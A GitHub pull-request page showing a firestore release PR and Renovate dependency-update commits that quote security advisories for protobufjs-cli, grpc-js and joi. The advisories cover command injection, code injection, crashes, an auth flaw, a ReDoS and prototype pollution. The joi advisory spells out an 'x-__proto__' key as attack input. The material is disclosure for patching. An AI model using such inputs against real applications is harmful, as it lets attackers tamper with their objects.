Skip to content

chore(main): release firestore 8.6.0 - #8203

Closed
codyoss wants to merge 1 commit into
mainfrom
release-please--branches--main--components--firestore
Closed

codyoss wants to merge 1 commit into
mainfrom
release-please--branches--main--components--firestore

Conversation

@codyoss

@codyoss codyoss commented May 6, 2026 •

Copy link
Copy Markdown
Member

🤖 I have created a release beep boop

8.6.0 (2026-05-06)

Features

  • firestore: Added FieldValue.minimum() and FieldValue.maximum() (#8151) (41671b0)
  • firestore: Added search stage support for languageCode, offset, limit, and retrievalDepth (#8161) (4acb075)

Bug Fixes

  • Bump all node submodules (#8178) (9fd76ef)
  • Change the copyright year for files in the packages folder (#8109) (c1a03fe)
  • firestore: Ensure limit(0) is properly serialized in query requests (#8076) (8631008), closes #7382
  • firestore: Respect ignoreUndefinedProperties in subpipelines (#8089) (a9f6c3f)

This PR was generated with Release Please. See documentation.

@codyoss
codyoss force-pushed the release-please--branches--main--components--firestore branch from 7033d9c to 1b3c8a2 Compare May 6, 2026 18:07
@codyoss
codyoss requested a review from a team as a code owner May 6, 2026 18:07
@codyoss
codyoss requested a review from a team as a code owner May 6, 2026 18:07

@gemini-code-assist gemini-code-assist Bot left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Code Review

This pull request updates the handwritten/firestore package from version 8.5.0 to 8.6.0. The update introduces new features including FieldValue.minimum(), FieldValue.maximum(), and enhanced search stage support for languageCode, offset, limit, and retrievalDepth. It also includes bug fixes for limit(0) serialization and the handling of undefined properties in subpipelines. I have no feedback to provide.

@release-please
release-please Bot force-pushed the release-please--branches--main--components--firestore branch from 1b3c8a2 to dd8d5f7 Compare May 6, 2026 21:35
@codyoss codyoss closed this May 11, 2026
shivanee-p pushed a commit that referenced this pull request Aug 10, 2026
…8253)

This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [protobufjs-cli](https://redirect.github.com/protobufjs/protobuf.js) |
[`1.2.0` →
`1.2.1`](https://renovatebot.com/diffs/npm/protobufjs-cli/1.2.0/1.2.1) |
![age](https://developer.mend.io/api/mc/badges/age/npm/protobufjs-cli/1.2.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/protobufjs-cli/1.2.0/1.2.1?slim=true)
|

---

### protobuf.js is Vulnerable to OS Command Injection in the CLI
[CVE-2026-42290](https://nvd.nist.gov/vuln/detail/CVE-2026-42290) /
[GHSA-f84p-cvgm-xgjj](https://redirect.github.com/advisories/GHSA-f84p-cvgm-xgjj)

<details>
<summary>More information</summary>

#### Details
##### Summary

`pbts` invoked JSDoc by building a shell command string from input file
paths and executing it through `child_process.exec`. File paths
containing shell metacharacters could therefore be interpreted by the
shell instead of being passed to JSDoc as plain arguments.

##### Impact

An attacker who can control file names or paths passed to `pbts` may be
able to execute arbitrary shell commands with the privileges of the
process running `pbts`.

This affects the protobufjs CLI tooling path. The protobufjs runtime
APIs for encoding, decoding, parsing, and loading protobuf messages are
not directly affected by this issue.

##### Preconditions

- The application or user must invoke `pbts` on file paths influenced by
an attacker.
- The attacker must be able to supply or create a path containing
shell-significant characters.
- The vulnerable `pbts` version must execute the generated JSDoc command
through a shell.

##### Workarounds

Do not run affected versions of `pbts` on attacker-controlled file names
or paths. If this cannot be avoided, sanitize or rename input files
before invoking `pbts`, or run the CLI in an isolated environment with
minimal privileges.

#### Severity
- CVSS Score: 7.8 / 10 (High)
- Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

#### References
-
[https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-f84p-cvgm-xgjj](https://redirect.github.com/protobufjs/protobuf.js/security/advisories/GHSA-f84p-cvgm-xgjj)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v1.2.1](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v1.2.1)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v2.0.2](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v2.0.2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-42290](https://nvd.nist.gov/vuln/detail/CVE-2026-42290)
-
[https://github.com/advisories/GHSA-f84p-cvgm-xgjj](https://redirect.github.com/advisories/GHSA-f84p-cvgm-xgjj)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-f84p-cvgm-xgjj)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### protobuf.js: Code injection in pbjs static output from crafted
schema names
[CVE-2026-44295](https://nvd.nist.gov/vuln/detail/CVE-2026-44295) /
[GHSA-6r35-46g8-jcw9](https://redirect.github.com/advisories/GHSA-6r35-46g8-jcw9)

<details>
<summary>More information</summary>

#### Details
##### Summary

`pbjs` static code generation could emit unsafe JavaScript identifiers
derived from schema-controlled names. When generating static JavaScript
from a crafted schema or JSON descriptor, certain namespace, enum,
service, or derived full names could be written into the generated
output without sufficient sanitization.

##### Impact

An attacker who can provide or influence schemas passed to `pbjs` may be
able to cause generated JavaScript output to contain attacker-controlled
code. The injected code would run if the generated file is later
executed or imported by the application or build process.

This affects the protobufjs CLI static code generation path.
Applications that only use trusted schemas, or that do not execute
generated output from untrusted schemas, are not directly affected.

##### Preconditions

- The application or build process must run `pbjs` static code
generation on a schema or JSON descriptor influenced by an attacker.
- The attacker-controlled input must contain crafted schema names that
reach generated JavaScript output.
- The generated JavaScript file must subsequently be executed, imported,
or otherwise evaluated.

##### Workarounds

Do not run affected versions of `pbjs` static code generation on
untrusted schemas or descriptors. If untrusted schemas must be accepted,
validate schema names before code generation and run generation in an
isolated environment.

#### Severity
- CVSS Score: 8.7 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N`

#### References
-
[https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-6r35-46g8-jcw9](https://redirect.github.com/protobufjs/protobuf.js/security/advisories/GHSA-6r35-46g8-jcw9)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v1.2.1](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v1.2.1)
-
[https://github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v2.0.2](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v2.0.2)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-44295](https://nvd.nist.gov/vuln/detail/CVE-2026-44295)
-
[https://github.com/advisories/GHSA-6r35-46g8-jcw9](https://redirect.github.com/advisories/GHSA-6r35-46g8-jcw9)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6r35-46g8-jcw9)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>protobufjs/protobuf.js (protobufjs-cli)</summary>

###
[`v1.2.1`](https://redirect.github.com/protobufjs/protobuf.js/releases/tag/protobufjs-cli-v1.2.1):
protobufjs-cli: v1.2.1

[Compare
Source](https://redirect.github.com/protobufjs/protobuf.js/compare/protobufjs-cli-v1.2.0...protobufjs-cli-v1.2.1)

##### Bug Fixes

- Backport input hardening and CLI fixes to 7.x
([#&#8203;2173](https://redirect.github.com/protobufjs/protobuf.js/issues/2173))
([75392ea](https://redirect.github.com/protobufjs/protobuf.js/commit/75392ea1b78bdc4faba027b5db44ad7c50e9c454))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/google-cloud-node).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNzMuNiIsInVwZGF0ZWRJblZlciI6IjQzLjE3OS4zIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6W119-->
shivanee-p pushed a commit that referenced this pull request Oct 7, 2026
…9506)

This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@grpc/grpc-js](https://grpc.io/)
([source](https://redirect.github.com/grpc/grpc-node)) | [`1.14.4` →
`1.14.5`](https://renovatebot.com/diffs/npm/@grpc%2fgrpc-js/1.14.4/1.14.5)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@grpc%2fgrpc-js/1.14.5?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@grpc%2fgrpc-js/1.14.4/1.14.5?slim=true)
|

---

### @&#8203;grpc/grpc-js can allocate memory for incoming messages well
above configured limits
[CVE-2024-37168](https://nvd.nist.gov/vuln/detail/CVE-2024-37168) /
[GHSA-7v5v-9h63-cj86](https://redirect.github.com/advisories/GHSA-7v5v-9h63-cj86)

<details>
<summary>More information</summary>

#### Details
##### Impact
There are two separate code paths in which memory can be allocated per
message in excess of the `grpc.max_receive_message_length` channel
option:

1. If an incoming message has a size on the wire greater than the
configured limit, the entire message is buffered before it is discarded.
2. If an incoming message has a size within the limit on the wire but
decompresses to a size greater than the limit, the entire message is
decompressed into memory, and on the server is not discarded.

##### Patches

This has been patched in versions 1.10.9, 1.9.15, and 1.8.22

#### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L`

#### References
-
[https://github.com/grpc/grpc-node/security/advisories/GHSA-7v5v-9h63-cj86](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-7v5v-9h63-cj86)
-
[https://github.com/grpc/grpc-node/commit/08b0422dae56467ecae1007e899efe66a8c4a650](https://redirect.github.com/grpc/grpc-node/commit/08b0422dae56467ecae1007e899efe66a8c4a650)
-
[https://github.com/grpc/grpc-node/commit/674f4e351a619fd4532f84ae6dff96b8ee4e1ed3](https://redirect.github.com/grpc/grpc-node/commit/674f4e351a619fd4532f84ae6dff96b8ee4e1ed3)
-
[https://github.com/grpc/grpc-node/commit/a8a020339c7eab1347a343a512ad17a4aea4bfdb](https://redirect.github.com/grpc/grpc-node/commit/a8a020339c7eab1347a343a512ad17a4aea4bfdb)
-
[https://nvd.nist.gov/vuln/detail/CVE-2024-37168](https://nvd.nist.gov/vuln/detail/CVE-2024-37168)
-
[https://github.com/advisories/GHSA-7v5v-9h63-cj86](https://redirect.github.com/advisories/GHSA-7v5v-9h63-cj86)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-7v5v-9h63-cj86)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### @&#8203;grpc/grpc-js: An incoming malformed compressed message can
cause a client or server crash
[CVE-2026-48069](https://nvd.nist.gov/vuln/detail/CVE-2026-48069) /
[GHSA-99f4-grh7-6pcq](https://redirect.github.com/advisories/GHSA-99f4-grh7-6pcq)

<details>
<summary>More information</summary>

#### Details
##### Impact
An invalid incoming compressed message can cause a client or server
process to crash. This affects all clients and servers that use
@&#8203;grpc/grpc-js

##### Patches
The following version have fixes for this vulnerability:

 - 1.9.16
 - 1.10.12
 - 1.11.4
 - 1.12.7
 - 1.13.5
 - 1.14.4

##### Workarounds
There is no workaround.

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/grpc/grpc-node/security/advisories/GHSA-99f4-grh7-6pcq](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-99f4-grh7-6pcq)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.12](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.12)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.11.4](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.11.4)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.12.7](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.12.7)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.13.5](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.13.5)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.14.4](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.14.4)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.9.16](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.9.16)
-
[https://github.com/advisories/GHSA-99f4-grh7-6pcq](https://redirect.github.com/advisories/GHSA-99f4-grh7-6pcq)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-99f4-grh7-6pcq)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### @&#8203;grpc/grpc-js: A malformed request can cause a server crash
[CVE-2026-48068](https://nvd.nist.gov/vuln/detail/CVE-2026-48068) /
[GHSA-5375-pq7m-f5r2](https://redirect.github.com/advisories/GHSA-5375-pq7m-f5r2)

<details>
<summary>More information</summary>

#### Details
##### Impact
An invalid incoming HTTP/2 stream initiation can cause a server process
to crash. This affects all servers created using @&#8203;grpc/grpc-js.

##### Patches
The following version have fixes for this vulnerability:

 - 1.9.16
 - 1.10.12
 - 1.11.4
 - 1.12.7
 - 1.13.5
 - 1.14.4

##### Workarounds
There is no workaround.

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/grpc/grpc-node/security/advisories/GHSA-5375-pq7m-f5r2](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-5375-pq7m-f5r2)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.12](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.10.12)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.11.4](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.11.4)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.12.7](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.12.7)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.13.5](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.13.5)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.14.4](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.14.4)
-
[https://github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.9.16](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc%2Fgrpc-js%401.9.16)
-
[https://github.com/advisories/GHSA-5375-pq7m-f5r2](https://redirect.github.com/advisories/GHSA-5375-pq7m-f5r2)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-5375-pq7m-f5r2)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### @&#8203;grpc/grpc-js: The server transmits some error messages
thrown by method handlers to the client in status messages
[CVE-2026-101915](https://nvd.nist.gov/vuln/detail/CVE-2026-101915) /
[GHSA-f596-whhp-79r4](https://redirect.github.com/advisories/GHSA-f596-whhp-79r4)

<details>
<summary>More information</summary>

#### Details
##### Impact
If an application method handler crashes, the error message is included
in the status message sent to the client. This can leak to the client
any sensitive data that may be included in the error message. This
impacts anyone using `@grpc/grpc-js` to run servers.

##### Patches
This vulnerability is fixed in 1.13.6 and 1.14.5.

##### Workarounds
This can be avoided by using a top-level error handler in method
handlers to strip out sensitive error information.

#### Severity
- CVSS Score: 3.7 / 10 (Low)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N`

#### References
-
[https://github.com/grpc/grpc-node/security/advisories/GHSA-f596-whhp-79r4](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-f596-whhp-79r4)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-101915](https://nvd.nist.gov/vuln/detail/CVE-2026-101915)
-
[https://github.com/grpc/grpc-node/commit/350de32860428cc62473a00bee4035360690ffea](https://redirect.github.com/grpc/grpc-node/commit/350de32860428cc62473a00bee4035360690ffea)
-
[https://github.com/grpc/grpc-node/commit/7c5c5181159c6ddd292805881ef2cdec29bb475f](https://redirect.github.com/grpc/grpc-node/commit/7c5c5181159c6ddd292805881ef2cdec29bb475f)
-
[https://github.com/grpc/grpc-node/commit/e8329b122ca99ba10877e990c2f6edd40224fd0d](https://redirect.github.com/grpc/grpc-node/commit/e8329b122ca99ba10877e990c2f6edd40224fd0d)
-
[https://github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.13.6](https://redirect.github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.13.6)
-
[https://github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.14.5](https://redirect.github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.14.5)
-
[https://github.com/advisories/GHSA-f596-whhp-79r4](https://redirect.github.com/advisories/GHSA-f596-whhp-79r4)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-f596-whhp-79r4)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### @&#8203;grpc/grpc-js: In certain configurations, getAuthContext can
return unauthorized certificates as though they were authorized
[CVE-2026-101916](https://nvd.nist.gov/vuln/detail/CVE-2026-101916) /
[GHSA-m9gg-hp2v-232j](https://redirect.github.com/advisories/GHSA-m9gg-hp2v-232j)

<details>
<summary>More information</summary>

#### Details
##### Impact
When server credentials are created with the `requireClientCertificate`
option set to `false`, `getAuthContext` does not distinguish between
authorized and unauthorized certificates in its return value. This can
create improper authentication vulnerabilities for `@grpc/grpc-js` users
who use the result of `getAuthContext` for authentication.

In particular, `@grpc/grpc-js-xds` can both set the
`requireClientCertificate` option to `false` and use the return value of
`getAuthContext` for RBAC authentication in some configurations.

##### Patches

This vulenrability is fixed in 1.13.6 and 1.14.5.

##### Workarounds
`@grpc/grpc-js` users using `getAuthContext` this way can avoid this
problem by setting `requireClientCertificate` to `true`.
`@grpc/grpc-js-xds` users using RBAC can avoid this by setting the
`require_client_certificate` field to `true` in the DownstreamTlsContext
in the xDS configuration.

#### Severity
- CVSS Score: 7.4 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N`

#### References
-
[https://github.com/grpc/grpc-node/security/advisories/GHSA-m9gg-hp2v-232j](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-m9gg-hp2v-232j)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-101916](https://nvd.nist.gov/vuln/detail/CVE-2026-101916)
-
[https://github.com/grpc/grpc-node/commit/2a84ec8b01b9db68ed9d2b117a53a81449edb8ee](https://redirect.github.com/grpc/grpc-node/commit/2a84ec8b01b9db68ed9d2b117a53a81449edb8ee)
-
[https://github.com/grpc/grpc-node/commit/b4e0079c6d22a2adedfcac748e0bc083f783bc7c](https://redirect.github.com/grpc/grpc-node/commit/b4e0079c6d22a2adedfcac748e0bc083f783bc7c)
-
[https://github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.14.5](https://redirect.github.com/grpc/grpc-node/releases/tag/@grpc/grpc-js%401.14.5)
-
[https://github.com/advisories/GHSA-m9gg-hp2v-232j](https://redirect.github.com/advisories/GHSA-m9gg-hp2v-232j)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-m9gg-hp2v-232j)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### Release Notes

<details>
<summary>grpc/grpc-node (@&#8203;grpc/grpc-js)</summary>

###
[`v1.14.5`](https://redirect.github.com/grpc/grpc-node/releases/tag/%40grpc/grpc-js%401.14.5):
@&#8203;grpc/grpc-js 1.14.5

[Compare
Source](https://redirect.github.com/grpc/grpc-node/compare/@grpc/[email protected]...@grpc/[email protected])

- Fix a bug that caused clients to automatically transmit excessive
error details to clients by default ([advisory
GHSA-f596-whhp-79r4](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-f596-whhp-79r4))
- Fix a bug that caused `getAuthContext` to return unverified
certificates as though they were verified in some configurations
([advisory
GHSA-m9gg-hp2v-232j](https://redirect.github.com/grpc/grpc-node/security/advisories/GHSA-m9gg-hp2v-232j))
- Fix a bug that could cause stale call data to accumulate if a channel
failed to connect for a long period of time
([#&#8203;3078](https://redirect.github.com/grpc/grpc-node/issues/3078))
- Fix a bug that could cause call status to be reported with expected
fields missing
([#&#8203;3079](https://redirect.github.com/grpc/grpc-node/issues/3079))
- Avoid redundant end() calls on completed HTTP/2 streams
([#&#8203;3082](https://redirect.github.com/grpc/grpc-node/issues/3082)
contributed by
[@&#8203;olavloite](https://redirect.github.com/olavloite))
- Unify call numbers and avoid disabled trace allocations
([#&#8203;3084](https://redirect.github.com/grpc/grpc-node/issues/3084)
contributed by
[@&#8203;olavloite](https://redirect.github.com/olavloite))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/googleapis/google-cloud-node).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0NC4xMjUuMSIsInVwZGF0ZWRJblZlciI6IjQ0LjEyNS4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6W119-->
shivanee-p pushed a commit that referenced this pull request Oct 7, 2026
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [joi](https://redirect.github.com/hapijs/joi) | [`17.13.4` →
`17.13.7`](https://renovatebot.com/diffs/npm/joi/17.13.4/17.13.7) |
![age](https://developer.mend.io/api/mc/badges/age/npm/joi/17.13.7?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/joi/17.13.4/17.13.7?slim=true)
|

---

### joi: object().rename() with a template target can set the validated
object's prototype
[CVE-2026-84367](https://nvd.nist.gov/vuln/detail/CVE-2026-84367) /
[GHSA-gg4h-3hg2-grpc](https://redirect.github.com/advisories/GHSA-gg4h-3hg2-grpc)

<details>
<summary>More information</summary>

#### Details
##### Impact

Applications are affected only if a schema renames keys with a
regular-expression source and a `Joi.expression()` / `Joi.x()` target
that interpolates the pattern's own match data, combined with `{
multiple: true }`, for example `.rename(/^x-(.+)$/,
Joi.x('{#&#8203;1}'), { multiple: true })`. Because the target is
rendered from the matched input key, an attacker who controls input keys
can send `x-__proto__` with an object value and make the rename target
render as `__proto__`, which sets the prototype of the object joi
returns instead of creating a key on it. The global `Object.prototype`
is not modified, so the effect is confined to the object returned by
that one `validate()` call.

Schemas using a static string rename target are not affected, and
neither are schemas left on the default `{ multiple: false }`.

##### Patches

Versions 17.13.5 and 18.2.4 have been released to address the issue.

##### Workarounds

1. Replace the template rename target with a static string target.
2. Keep the template but make the capture unable to produce `__proto__`,
using a negative lookahead: `.rename(/^x-(?!__proto__$)(.+)$/,
Joi.x('{#&#8203;1}'), { multiple: true })`
3. Drop { multiple: true } from the rename, which stops the rename
before the assignment.

#### Severity
- CVSS Score: 3.7 / 10 (Low)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N`

#### References
-
[https://github.com/hapijs/joi/security/advisories/GHSA-gg4h-3hg2-grpc](https://redirect.github.com/hapijs/joi/security/advisories/GHSA-gg4h-3hg2-grpc)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-84367](https://nvd.nist.gov/vuln/detail/CVE-2026-84367)
-
[https://github.com/hapijs/joi/pull/3134](https://redirect.github.com/hapijs/joi/pull/3134)
-
[https://github.com/hapijs/joi/pull/3135](https://redirect.github.com/hapijs/joi/pull/3135)
-
[https://github.com/hapijs/joi/commit/162f367aa178d2e1ebec8dc1164e5fe16536ddf6](https://redirect.github.com/hapijs/joi/commit/162f367aa178d2e1ebec8dc1164e5fe16536ddf6)
-
[https://github.com/hapijs/joi/commit/172ececa192feda532b743d77bc9d3e523d19b01](https://redirect.github.com/hapijs/joi/commit/172ececa192feda532b743d77bc9d3e523d19b01)
-
[https://github.com/hapijs/joi/releases/tag/v17.13.5](https://redirect.github.com/hapijs/joi/releases/tag/v17.13.5)
-
[https://github.com/hapijs/joi/releases/tag/v18.2.4](https://redirect.github.com/hapijs/joi/releases/tag/v18.2.4)
-
[https://github.com/advisories/GHSA-gg4h-3hg2-grpc](https://redirect.github.com/advisories/GHSA-gg4h-3hg2-grpc)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-gg4h-3hg2-grpc)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### joi: Prototype pollution via a `__proto__` language key in custom
messages
[CVE-2026-84368](https://nvd.nist.gov/vuln/detail/CVE-2026-84368) /
[GHSA-6w3j-5fw6-r9vr](https://redirect.github.com/advisories/GHSA-6w3j-5fw6-r9vr)

<details>
<summary>More information</summary>

#### Details
##### Impact
An application that passes attacker-controlled data into joi's custom
message configuration (`messages()`, `message()`, `prefs({ messages })`,
`Joi.extend({ messages })` or `rule({ message })`) lets the attacker
write properties onto `Object.prototype`, where every object in the
process then inherits them. A key named `__proto__` was treated as a
language name, and the code reused the object it found at that key,
which resolves to the prototype rather than to a new own property; a key
named `constructor` did the same to the `Object` function's statics. A
consuming application that gates on the mere presence of a property (`if
(user.isAdmin)`) can be made to take the wrong branch for every object
it inspects.

This is not reachable from data that joi validates. Custom messages are
schema-construction configuration, normally written by the application
developer. Exploitation therefore requires an application that feeds
untrusted input straight into schema construction.

##### Patches
Upgrade to version 18.2.5 or 17.13.6.

##### Workarounds
Do not pass untrusted input into `messages()`, `message()`, `prefs({
messages })`, `Joi.extend({ messages })` or `rule({ message })`. Or
validate that they don't contain any `__proto__` or `constructor`
property.

#### Severity
- CVSS Score: 3.7 / 10 (Low)
- Vector String: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N`

#### References
-
[https://github.com/hapijs/joi/security/advisories/GHSA-6w3j-5fw6-r9vr](https://redirect.github.com/hapijs/joi/security/advisories/GHSA-6w3j-5fw6-r9vr)
-
[https://nvd.nist.gov/vuln/detail/CVE-2026-84368](https://nvd.nist.gov/vuln/detail/CVE-2026-84368)
-
[https://github.com/hapijs/joi/pull/3138](https://redirect.github.com/hapijs/joi/pull/3138)
-
[https://github.com/hapijs/joi/pull/3139](https://redirect.github.com/hapijs/joi/pull/3139)
-
[https://github.com/hapijs/joi/commit/8d0b808f3e874d28f9078f61b7742290989afb36](https://redirect.github.com/hapijs/joi/commit/8d0b808f3e874d28f9078f61b7742290989afb36)
-
[https://github.com/hapijs/joi/commit/90d07571923c90e3432a328fc041d1cda03d30fa](https://redirect.github.com/hapijs/joi/commit/90d07571923c90e3432a328fc041d1cda03d30fa)
-
[https://github.com/advisories/GHSA-6w3j-5fw6-r9vr](https://redirect.github.com/advisories/GHSA-6w3j-5fw6-r9vr)

This data is provided by the [GitHub Advisory
Database](https://redirect.github.com/advisories/GHSA-6w3j-5fw6-r9vr)
([CC-BY
4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)).
</details>

---

### joi: Quadratic regular-expression backtracking in
`Joi.string().isoDate()`

[GHSA-6h2x-m376-mqjq](https://redirect.github.com/advisories/GHSA-6h2x-m376-mqjq)

<details>
<summary>More information</summary>

#### Details
##### Impact
Any application that validates a user-supplied string with
`Joi.string().isoDate()` can be stalled by a single request. One of the
regular expressions the rule runs over the input was unanchored, so a
valid ISO date followed by a long run of fractional-second digits made
the regex engine restart its search from every position in the string,
costing time proportional to the square of the input length. 64 KB of
digits costs about 1.4 s and 256 KB about 22 s.

##### Patches
Upgrade to version 17.13.7 or 18.2.6 depending on your current major
version.

##### Workarounds
None except capping the length of the string before it reaches joi.

#### Severity
- CVSS Score: 7.5 / 10 (High)
- Vector String: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`

#### References
-
[https://github.com/hapijs/joi/security/advisories/GHSA-6h2x-m376-mqjq](https://redirect.github.com/hapijs/joi/security/advisories/GHSA-6h2x-m376-mqjq)
-
